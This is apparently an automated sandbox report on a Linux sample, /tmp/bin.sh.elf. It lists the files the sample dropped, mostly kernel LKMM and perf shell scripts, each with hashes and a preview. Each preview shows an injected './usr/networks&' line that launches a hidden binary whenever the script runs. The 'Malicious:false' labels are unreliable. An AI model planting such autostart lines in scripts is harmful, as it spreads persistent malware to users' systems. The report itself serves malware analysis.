                                                                  Encrypted:false
                                                                  SSDEEP:24:R0T53Bv5a0AdgAklFKMRk4q+D2VIa8190I/:ROBv00TnlFKQk4qmAYGY
                                                                  MD5:53CB60A015FB1536F58CA145670656F9
                                                                  SHA1:FA1FDDC86852107CE96D1E4F74F681A61FCEC45A
                                                                  SHA-256:EFF34D4C6394243F0DC6EBEAED9BFB4A88AF69C086D22736B70586320D7E60EB
                                                                  SHA-512:AAA81CD721DF911EA07BC5144A15F8E090F7773ED0C12086D41206458EF3BEABAC48761D62AA54020416CB1345788FBEBC33AA768CF4DB5B61AAFB16C6CA1AC9
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 255.fi..# Create any new directories that have appeared in the github litmus.# repo since the last run..if test "$LKMM_DESTDIR" != ".".then..find $litmusdir -type d -print |..( cd "$LKMM_DESTDIR"; sed -e 's/^/mkdir -p /' | sh ).fi..# Find the checklitmus script. If it is not where we expect it, then.# assume that the caller has the PATH environment variable set.# appropriately..if test -x scripts/checklitmus.sh.then..clscript=scripts/checklitmus.sh.else..clscript=checklitmus.sh.fi..# Run the script on all the litmus tests in the specified directory.ret=0.for i in $litmusdir/*.litmus.do..if ! $clscript $i..then...ret=1..fi.done.if test "$ret" -ne 0.then..echo " ^^^ VERIFICATION MISMATCHES" 1>&2.else..echo All litmus tests verified as was expected. 1>&2.fi.exit $ret../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):238
                                                                  Entropy (8bit):5.071110010800678
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVaEJZKQRFKVRMKU7SKVxstn17QLGiX9DIgM3o287AX8Vx27B7AY7QLsLImp25G:SHRFKkf6tGJRnMYR7A0g7tAhAIcADMn
                                                                  MD5:9D4B9506D89C638D6D8274F863158FF5
                                                                  SHA1:808852D855162FD0825E8F60F3E1969A0B2666F2
                                                                  SHA-256:8FA50AD52F48649C6688AEC4A9098BEE1303DB3E48CAEC578CC1C0C0D1CE387D
                                                                  SHA-512:A3007389BCDE5749CB0023EC196956FC93148A4FDB45E9014AFE46F5991F4D64244D5A82680156639CD285DB7589D433071C298786A5A31B03DE02929C2AF677
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 255.fi..echo Herd options: $herdoptions > $LKMM_DESTDIR/$litmus.out./usr/bin/time $LKMM_TIMEOUT_CMD herd7 $herdoptions $litmus >> $LKMM_DESTDIR/$litmus.out 2>&1..scripts/judgelitmus.sh $litmus../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1323
                                                                  Entropy (8bit):5.176348294995237
                                                                  Encrypted:false
                                                                  SSDEEP:24:rvV7wy7SOPnbjavF+8Yxw8wynJA//3OBZhnDLAejinuJYqgIW:rvZL7Hqv4vxw8wiJyeDLdjinqgIW
                                                                  MD5:E1B6CD014E82774900528014EF0D6F2E
                                                                  SHA1:ED30423AC7DC87314B36C6E41813C6A67D02117F
                                                                  SHA-256:31B7794E2BE2068A4A322B3209E67C7C83519C06F9EB1139BC2849BBCB92BE47
                                                                  SHA-512:126676C1B47B9594F0B6555083D37086C5EA63B8C8BC70E59C96CE0D7614F0E9725346BB053D0836C2D5B775FDC1D42662C518A014868B62F52F9CA295C8818B
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# Create the results directory and populate it with subdirectories..# The initial output is created here to avoid clobbering the output.# generated earlier..mkdir $T/results.find litmus -type d -print | ( cd $T/results; sed -e 's/^/mkdir -p /' | sh )..# Create the list of litmus tests already run, then remove those that.# are excluded by this run's --procs argument..( cd $LKMM_DESTDIR; find litmus -name '*.litmus.out' -print ) |..sed -e 's/\.out$//' |..xargs -r grep -L "^P${LKMM_PROCS}"> $T/list-C-already.xargs < $T/list-C-already -r grep -L "^P${LKMM_PROCS}" > $T/list-C-short..# Redirect output, run tests, then restore destination directory..destdir="$LKMM_DESTDIR".LKMM_DESTDIR=$T/results; export LKMM_DESTDIR.scripts/runlitmushist.sh < $T/list-C-short > $T/runlitmushist.sh.out 2>&1.LKMM_DESTDIR="$destdir"; export LKMM_DESTDIR..# Move the newly generated .litmus.out files to .litmus.out.new files.# in the destination directory..cdir=`pwd`.ddir=`awk -v c="$cd
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):58
                                                                  Entropy (8bit):4.00869856467617
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVay6vBBvKDlOORgn:w6vfK4n
                                                                  MD5:22E8085372E3C003B959BE0A933F9CEB
                                                                  SHA1:5CDE716897DC5B6292E7D1FA46016E94F99BEDDD
                                                                  SHA-256:80982D86AADCE09EDE1347AF7482DCC96B62072095F0A89CDB5449551ECEA9CC
                                                                  SHA-512:0B4BC529920464D4B403CCB3ED8FAC48EA36C1F32FCF2F3CCBFAFA29C81639173241E08C0620EC50A06AD933F6F90B5BE72EFB4964734832E4ECDED1712A6E35
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):3.925523369006428
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1367
                                                                  Entropy (8bit):5.270907869988027
                                                                  Encrypted:false
                                                                  SSDEEP:24:5DFAFYyoClvAOwGzGS3ijcSGKpf7lIr7QjfGuo7CC7QjCj:5XYoN+pSrpf7Cr7yHo737j
                                                                  MD5:172B8DAE8369EA2330CE22C4B1174B3E
                                                                  SHA1:759FCB2912FC0CAD0665ED443B742D9422D2C6CC
                                                                  SHA-256:47E367795A2B50C36481670343B8E156283738611DEFF3A3D31546E10DF64FDE
                                                                  SHA-512:95B88828588226BE0EC0E2D4E59B6A80C16F0243DB407BCE510B8F4962D7C84769F62F3CBD83EEBEFF54185BB39191CD4FCD98F37AA583AD343A25C0685C99BB
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 255.fi.if test -f "$LKMM_DESTDIR/$litmus".out -a -r "$LKMM_DESTDIR/$litmus".out.then..:.else..echo ' --- ' error: \"$LKMM_DESTDIR/$litmus\".out is not a readable file..exit 255.fi.if grep -q '^ \* Result: ' $litmus.then..outcome=`grep -m 1 '^ \* Result: ' $litmus | awk '{ print $3 }'`.else..outcome=specified.fi..grep '^Observation' $LKMM_DESTDIR/$litmus.out.if grep -q '^Observation' $LKMM_DESTDIR/$litmus.out.then..:.else..echo ' !!! Verification error' $litmus..if ! grep -q '!!!' $LKMM_DESTDIR/$litmus.out..then...echo ' !!! Verification error' >> $LKMM_DESTDIR/$litmus.out 2>&1..fi..exit 255.fi.if test "$outcome" = DEADLOCK.then..if grep '^Observation' $LKMM_DESTDIR/$litmus.out | grep -q 'Never 0 0$'..then...ret=0..else...echo " !!! Unexpected non-$outcome verification" $litmus...if ! grep -q '!!!' $LKMM_DESTDIR/$litmus.out...then....echo " !!! Unexpected non-$outcome verification" >> $LKMM_DESTDIR/$litmus.out 2>&1...fi...ret=1..fi.elif grep '^Observation' $LKMM_DE
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1280
                                                                  Entropy (8bit):5.0293104555166925
                                                                  Encrypted:false
                                                                  SSDEEP:24:rI0T53Bv5aSj7CT+8YxwGedC/xzBwyBlzBxTwPN0xXjOhmpq4:rIOBv0chvxww5lwa9BxTwV098E
                                                                  MD5:02F7CF80354BAC6CF9C89AF6FF3CFF6C
                                                                  SHA1:C79857207AA510D3CFCD4CF550D5180031151523
                                                                  SHA-256:D82CD5F2B11EF107DCE3B0F870925AB18172614DC3948CBABBF7816A699E3167
                                                                  SHA-512:74660F916E6AEE1C4E512A72F2362FB61E1AC74E0CCE15C0AD7DE9FA41B530DE14F647DFAC11EECEA314FF50CE59DB612D37D2F1E4C82F68885993110C25F44E
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# Create any new directories that have appeared in the github litmus.# repo since the last run..if test "$LKMM_DESTDIR" != ".".then..find litmus -type d -print |..( cd "$LKMM_DESTDIR"; sed -e 's/^/mkdir -p /' | sh ).fi..# Create a list of the C-language litmus tests previously run..( cd $LKMM_DESTDIR; find litmus -name '*.litmus.out' -print ) |..sed -e 's/\.out$//' |..xargs -r grep -L "^P${LKMM_PROCS}"> $T/list-C-already..# Form full list of litmus tests with no more than the specified.# number of processes (per the --procs argument)..find litmus -name '*.litmus' -exec grep -l -m 1 "^C " {} \; > $T/list-C-all.xargs < $T/list-C-all -r grep -L "^P${LKMM_PROCS}" > $T/list-C-short..# Form list of new tests. Note: This does not handle litmus-test deletion!.sort $T/list-C-already $T/list-C-short | uniq -u > $T/list-C-new..# Form list of litmus tests that have changed since the last run..sed < $T/list-C-short -e 's,^.*$,if test & -nt '"$LKMM_DESTDIR"'/&.out; then
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1879
                                                                  Entropy (8bit):5.440616965091095
                                                                  Encrypted:false
                                                                  SSDEEP:24:Xh5s1mUKl+RTKH/EI8dS4LThfuTWVhxPVUnvKMLdeP9UcvyP4rTMD0DVDT/VI9Vy:xU6l+ReHsZSspTVU9Ldc9Ucdo0xDT/Ay
                                                                  MD5:4C06EBFB05EA8E30772579E05023463A
                                                                  SHA1:EB26B02ABCE95938F951FB9C9EEE0B78E6750851
                                                                  SHA-256:1931EE8FC36415CD7B34DB8A4DE4F26DF91DFD87A5DFD73D036A5C705AD4D83B
                                                                  SHA-512:7EF3D6ECC82116BD799C104F908D2DAD9214B3636D6A796D11057D23AF9E71800170BEEDA7E65EFE93249B8A321F20C671AB7C742A248351ACDF6AC6AAB29600
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.}..usage () {..usagehelp 1>&2.}..# checkarg --argname argtype $# arg mustmatch cannotmatch.checkarg () {..if test $3 -le 1..then...echo $1 needs argument $2 matching \"$5\"...usage..fi..if echo "$4" | grep -q -e "$5"..then...:..else...echo $1 $2 \"$4\" must match \"$5\"...usage..fi..if echo "$4" | grep -q -e "$6"..then...echo $1 $2 \"$4\" must not match \"$6\"...usage..fi.}..while test $# -gt 0.do..case "$1" in..--destdir)...checkarg --destdir "(path to directory)" "$#" "$2" '.\+' '^--'...LKMM_DESTDIR="$2"...mkdir $LKMM_DESTDIR > /dev/null 2>&1...if ! test -e "$LKMM_DESTDIR"...then....echo "Cannot create directory --destdir '$LKMM_DESTDIR'"....usage...fi...if test -d "$LKMM_DESTDIR" -a -w "$LKMM_DESTDIR" -a -x "$LKMM_DESTDIR"...then....:...else....echo "Directory --destdir '$LKMM_DESTDIR' insufficient permissions to create files"....usage...fi...shift...;;..--herdopts|--herdopt)...checkarg --destdir "(herd7 options)" "$#" "$2" '.*' '^--'...LKMM_HERD_OPTIONS="$2"
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1443
                                                                  Entropy (8bit):5.41418500417696
                                                                  Encrypted:false
                                                                  SSDEEP:24:rfccQtgUqueyYMY4QSh7Lxh7L2Qq424xBKQVZo+ARMxEZdjHsH+JYogedjV0OcNE:rUrtx/YMY4QwfPf2dR4xBKkZiMxOeH+P
                                                                  MD5:44C78B91109C3A4958CC8E2C2FC8E238
                                                                  SHA1:06DE355AEA0AADCDD20C42F7EC9F62C546061703
                                                                  SHA-256:A628A0EED4A15189005511AC4BCEA2E66336C449FFD6CC3128B5E60AF7A0F572
                                                                  SHA-512:4BC6BAF05DAE9908727DACF5318ADDB7470D0A727653C369525FD34F2ACB418257508F198D232AF59061B8DF4D2B33CDF1F04FE76F2E92A0590495E3398D9446
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# Prefixes for per-CPU scripts.for ((i=0;i<$LKMM_JOBS;i++)).do..echo dir="$LKMM_DESTDIR" > $T/$i.sh..echo T=$T >> $T/$i.sh..echo herdoptions=\"$LKMM_HERD_OPTIONS\" >> $T/$i.sh..cat << '___EOF___' >> $T/$i.sh..runtest () {...echo ' ... ' /usr/bin/time $LKMM_TIMEOUT_CMD herd7 $herdoptions $1 '>' $dir/$1.out '2>&1'...if /usr/bin/time $LKMM_TIMEOUT_CMD herd7 $herdoptions $1 > $dir/$1.out 2>&1...then....if ! grep -q '^Observation ' $dir/$1.out....then.....echo ' !!! Herd failed, no Observation:' $1....fi...else....exitcode=$?....if test "$exitcode" -eq 124....then.....exitmsg="timed out"....else.....exitmsg="failed, exit code $exitcode"....fi....echo ' !!! Herd' ${exitmsg}: $1...fi..}.___EOF___.done..awk -v q="'" -v b='\\' '.{..print "echo `grep " q "^P[0-9]" b "+(" q " " $0 " | tail -1 | sed -e " q "s/^P" b "([0-9]" b "+" b ")(.*$/" b "1/" q "` " $0.}' | bash |.sort -k1n |.awk -v ncpu=$LKMM_JOBS -v t=$T '.{..print "runtest " $2 >> t "/" NR % ncpu ".sh";.}..END {
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):723
                                                                  Entropy (8bit):5.350945108759267
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vWyou60IXQrFQjsLUgqXl2nwJ6vAEqNT8oFlEgthlPpLiflme5qOzCdwRpW4RV:rW9j0NrFcsLoXl2zAlRZ3EO/PpLgecp1
                                                                  MD5:B11F4C76E62677D0C2C93338430FDE43
                                                                  SHA1:B65C4B0CBAB7AE00CBB3CA2BAC57B36C74295355
                                                                  SHA-256:B1C5813EF3CC813C1CE5B9A6820D0F0E4B1DAE90F3D9B1EEBDC1875C5DA51B7D
                                                                  SHA-512:592A2B91DD3DF13EF1FECDFB4B2BCA0CA2E7020226314727560935DF36B2FDA46727DEBD16C410D12C67C82BB1A62DA6725BFD950BF89341FC5BED44B94FA27D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# Check that the fault injection directory exists.DEBUGDIR=`echo $DEBUGFS | awk '{print $2}'`/nfsd.if [ ! -d "$DEBUGDIR" ]; then..echo "$DEBUGDIR does not exist"..echo "Check that your .config selects CONFIG_NFSD_FAULT_INJECTION"..exit 1.fi..function help().{..echo "Usage $0 injection_type [count]"..echo ""..echo "Injection types are:"..ls $DEBUGDIR..exit 1.}..if [ $# == 0 ]; then..help.elif [ ! -f $DEBUGDIR/$1 ]; then..help.elif [ $# != 2 ]; then..COUNT=0.else..COUNT=$2.fi..BEFORE=`mktemp`.AFTER=`mktemp`.dmesg > $BEFORE.echo $COUNT > $DEBUGDIR/$1.dmesg > $AFTER.# Capture lines that only exist in the $AFTER file.diff $BEFORE $AFTER | grep ">".rm -f $BEFORE $AFTER../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):458
                                                                  Entropy (8bit):5.00959691163534
                                                                  Encrypted:false
                                                                  SSDEEP:12:b/yF8GAh5AE4O35gZ8AN5AE4OMai5AE4ZAiFafG5AE4ZAi9ZSMn:b/m85kOJfc5kOVi5kZufG5kZvZ
                                                                  MD5:A4755C3D7F96AC9DDB980618EE1941CC
                                                                  SHA1:7483B6428F3BD46ABC16B7CB1D04509A56763D10
                                                                  SHA-256:AA6A92BAA645AA58764662FD541332178E1F5AB133B5A288FB2D287A857B70E4
                                                                  SHA-512:54CE3A1EEAB05442A80A1804152EC77C4418DFC81EC108B584788D19FEF14939C0E2322FA9D87B1E0894B44C0B7B07789A267B67F5350EED72B4600D698778EB
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi..cd ../....for i in $FILES; do. check $i.done..check arch/x86/include/asm/inat.h '-I "^#include [\"<]\(asm/\)*inat_types.h[\">]"'.check arch/x86/include/asm/insn.h '-I "^#include [\"<]\(asm/\)*inat.h[\">]"'.check arch/x86/lib/inat.c '-I "^#include [\"<]\(../include/\)*asm/insn.h[\">]"'.check arch/x86/lib/insn.c '-I "^#include [\"<]\(../include/\)*asm/in\(at\|sn\).h[\">]"'../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):584
                                                                  Entropy (8bit):4.880830745314398
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vCBmMU31bL21fijNv2YPJsPOvMp66ijNrJsPOvMbIj62fUfGn:rCUMUlbk8NvFPuPq06vNruPqK66XG
                                                                  MD5:6BDDA309AAC612431FEB20AFC9124980
                                                                  SHA1:8F5437F82EF33A58ACBEC1E066776CA9BF8EFC8A
                                                                  SHA-256:43A9E0DD99528C7F3B14ED56C6E1F437D324CB8477F30E752F65029045BD02F5
                                                                  SHA-512:FF1B93D16F7B1D233D48FD49B7930253AE28190DE932B9B448DA22FC5DFA5A90C3FD6CA94C493FF25E2A5C820AEFD01F36558F0240519A4D5C2424F44DCA5B47
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..cd $(dirname $0)..trap 'echo "Might need a more recent version of binutils"' EXIT..echo "Compiling insn-x86-dat-src.c to 64-bit object"..gcc -g -c insn-x86-dat-src.c..objdump -dSw insn-x86-dat-src.o | awk -f gen-insn-x86-dat.awk > insn-x86-dat-64.c..rm -f insn-x86-dat-src.o..echo "Compiling insn-x86-dat-src.c to 32-bit object"..gcc -g -c -m32 insn-x86-dat-src.c..objdump -dSw insn-x86-dat-src.o | awk -f gen-insn-x86-dat.awk > insn-x86-dat-32.c..rm -f insn-x86-dat-src.o..trap - EXIT..echo "Done (use git diff to see the changes)"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1155
                                                                  Entropy (8bit):5.244205012386464
                                                                  Encrypted:false
                                                                  SSDEEP:24:6fZ7Ed9hko5L6ko5Lk5U5kAo5BY85kOJfc5kOVR5kZuN5kZv4e12c52T:6x6dN6dNkmS5Y8Hfc5CQCA+2C2T
                                                                  MD5:9A01A481DCF3426E4D3D2CD18882AB28
                                                                  SHA1:A97052DA5C09338D04BCD380313B275BE6E42944
                                                                  SHA-256:60BF226ABC9F5B3D5AC0C591B4BF9BD07749A36171D85A0C1F5EA0DC985037E1
                                                                  SHA-512:7220C673402F83D27E29DBFAD6488DB76DF2A4DAFE8136D5065482D36DECE6829D7E6438D53D358CAF757C861638D5106AEBF36C5D4ACB550CF99DD135E0A76D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.test -d ../../include || exit 0..cd ../....# simple diff check.for i in $FILES; do. check $i -B.done..# diff with extra ignore lines.check arch/x86/lib/memcpy_64.S '-I "^EXPORT_SYMBOL" -I "^#include <asm/export.h>"'.check arch/x86/lib/memset_64.S '-I "^EXPORT_SYMBOL" -I "^#include <asm/export.h>"'.check include/uapi/asm-generic/mman.h '-I "^#include <\(uapi/\)*asm-generic/mman-common\(-tools\)*.h>"'.check include/uapi/linux/mman.h '-I "^#include <\(uapi/\)*asm/mman.h>"'.check include/linux/ctype.h. '-I "isdigit("'.check lib/ctype.c.. '-I "^EXPORT_SYMBOL" -I "^#include <linux/export.h>" -B'.check arch/x86/include/asm/inat.h '-I "^#include [\"<]\(asm/\)*inat_types.h[\">]"'.check arch/x86/include/asm/insn.h '-I "^#include [\"<]\(asm/\)*inat.h[\">]"'.check arch/x86/lib/inat.c. '-I "^#include [\"<]\(../include/\)*asm/insn.h[\">]"'.check arch/x86/lib/insn.c. '-I "^#include [\"<]\(../include/\)*asm/in\(at\|sn\).h[\">]"'..# diff
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):655
                                                                  Entropy (8bit):5.557065419733984
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6v5HKxhrYyZPjytOsMyVzr1oerr5bYlb3i/mnhjK4n:raBZOtOHyVylxng4
                                                                  MD5:5F6BDB1DD164C0B1412F1A48A21991B9
                                                                  SHA1:B5D3E44D0B2A794496C77D28B03FFD198F579967
                                                                  SHA-256:A144625B54FE5F40D5BA5E1FBBD12B7469FE7A93146A7E717C37129B1A6E1D65
                                                                  SHA-512:5CED1E7056789E773B2C72845EADB8E81E4EF6A0C8CDA51159006296B2948F71EA75B0EAFF54DA6C6AFBD62F88D86B03181B9CBE207BAE9175ACAAAC8EA02187
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..MANIFEST=$(mktemp /tmp/perf-archive-manifest.XXXXXX).PERF_BUILDID_LINKDIR=$(readlink -f $PERF_BUILDID_DIR)/..cut -d ' ' -f 1 $BUILDIDS | \.while read build_id ; do..linkname=$PERF_BUILDID_DIR.build-id/${build_id:0:2}/${build_id:2}..filename=$(readlink -f $linkname)..echo ${linkname#$PERF_BUILDID_DIR} >> $MANIFEST..echo ${filename#$PERF_BUILDID_LINKDIR} >> $MANIFEST.done..tar cjf $PERF_DATA.tar.bz2 -C $PERF_BUILDID_DIR -T $MANIFEST.rm $MANIFEST $BUILDIDS || true.echo -e "Now please run:\n".echo -e "$ tar xvf $PERF_DATA.tar.bz2 -C ~/.debug\n".echo "wherever you need to run 'perf report' on.".exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5976
                                                                  Entropy (8bit):5.501326007067708
                                                                  Encrypted:false
                                                                  SSDEEP:48:JsPA4w4mkW3+0yQXHuwCBA6RfAqN62YYwYSA+B5Af8ufUF+lmfUEVZOQXo0FNn5G:uPeJ+0yQXH3zGfYH+AYkW/k/7hQkQmc
                                                                  MD5:2367A910716F3184670C4A30214231F9
                                                                  SHA1:706F95FE61D127EB29A4B4A78EDA595D20DE7963
                                                                  SHA-256:742B8C3C32E4B47BD88CB39C22DAD76D6C24BBA566EBA18C6D98A7D73381EB28
                                                                  SHA-512:F942F9A19F485774E7E115C21E2372C1ABF433690A4C68F0BE96109C3C3338D2924DD60C8D8B2B06632C855CB405CF8D4DF37CCC4E6F4C41C92F72C894A49FFB
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1.}..find_perf().{..if [ -n "$PERF" ] ; then...return..fi..PERF=`which perf || true`..if [ -z "$PERF" ] ; then...echo "Failed to find perf" >&2.. exit 1..fi..if [ ! -x "$PERF" ] ; then...echo "Failed to find perf" >&2.. exit 1..fi..echo "Using $PERF".."$PERF" version.}..copy_kcore().{..echo "Copying kcore"...if [ $EUID -eq 0 ] ; then...SUDO=""..else...SUDO="sudo"..fi...rm -f perf.data.junk..("$PERF" record -o perf.data.junk "${PERF_OPTIONS[@]}" -- sleep 60) >/dev/null 2>/dev/null &..PERF_PID=$!...# Need to make sure that perf has started..sleep 1...KCORE=$(($SUDO "$PERF" buildid-cache -v -f -k /proc/kcore >/dev/null) 2>&1)..case "$KCORE" in.."kcore added to build-id cache directory "*)...KCORE_DIR=${KCORE#"kcore added to build-id cache directory "}..;;..*)...kill $PERF_PID...wait >/dev/null 2>/dev/null || true...rm perf.data.junk...echo "$KCORE"...echo "Failed to find kcore" >&2...exit 1..;;..esac...kill $PERF_PID..wait >/dev/null 2>/dev/null
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):203
                                                                  Entropy (8bit):4.726134994025493
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVYUg/yz6dQtvJ2qVB4UXpWLa7UXnUQg7KIBPfAX7UXDj2HvqlOORgn:Lyy9uSUXx7UX6ZBPfi7UXmPTn
                                                                  MD5:2B25349D8ED8573F5E23C69B731A0628
                                                                  SHA1:9347DECB096013BAE8C703472CF2812009064955
                                                                  SHA-256:9AF038A6F3B205CDB6DEA138218E5C79B6A68FBB6A76F65C8CE1AB47FDA0241C
                                                                  SHA-512:5A5B6BB51FDE49F8EDBFED2AE70E921BE04F72DF64E1085927A1CCEFA3478A075B85F0AA7776D38AB27A760AD2F624F7B70DB5D53262AED83379F48929732321
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.skip_if_no_perf_probe || exit 2... $(dirname $0)/lib/probe_vfs_getname.sh..add_probe_vfs_getname || skip_if_no_debuginfo.err=$?.cleanup_probe_vfs_getname.exit $err../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2564
                                                                  Entropy (8bit):5.249114774902953
                                                                  Encrypted:false
                                                                  SSDEEP:48:k5wfEdvLzMPrlxQvB4y4d4mBO7JN4d4mhu4d4md4d6sd4dm4dL4kkF4dL4kfSCCa:kmfwMPrTxrd2FqdPdEdudPdMkbdMk6C/
                                                                  MD5:183413018EA35B00671B5740CF8258E7
                                                                  SHA1:87F1954CEE6DE1E05B0E2693F547631FFB22C5C7
                                                                  SHA-256:ABB6A1A5F3CA30C3E5896B29E4C4D57CC5E7DC1C01FA160CF090A1330E70D5AF
                                                                  SHA-512:0E61B9CB1D1D586CC1815DEB03EC9DEEAC8334A37F4CC9C16EA6E78544FDAC8BFDC65C8396900A67F1D8F2743D351FE36B4B7FE49B9FC5D4758A06D70A14775A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.nm -Dg $libc 2>/dev/null | fgrep -q inet_pton || exit 254..event_pattern='probe_libc:inet_pton(\_[[:digit:]]+)?'..add_libc_inet_pton_event() {...event_name=$(perf probe -f -x $libc -a inet_pton 2>&1 | tail -n +2 | head -n -5 | \....grep -P -o "$event_pattern(?=[[:space:]]\(on inet_pton in $libc\))")...if [ $? -ne 0 -o -z "$event_name" ] ; then...printf "FAIL: could not add event\n"...return 1..fi.}..trace_libc_inet_pton_backtrace() {...expected=`mktemp -u /tmp/expected.XXX`...echo "ping[][0-9 \.:]+$event_name: \([[:xdigit:]]+\)" > $expected..echo ".*inet_pton\+0x[[:xdigit:]]+[[:space:]]\($libc|inlined\)$" >> $expected..case "$(uname -m)" in..s390x)...eventattr='call-graph=dwarf,max-stack=4'...echo "gaih_inet.*\+0x[[:xdigit:]]+[[:space:]]\($libc|inlined\)$" >> $expected...echo "(__GI_)?getaddrinfo\+0x[[:xdigit:]]+[[:space:]]\($libc|inlined\)$" >> $expected...echo "main\+0x[[:xdigit:]]+[[:space:]]\(.*/bin/ping.*\)$" >> $expected...;;..ppc64|ppc64le)...eventattr='max-stack
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):791
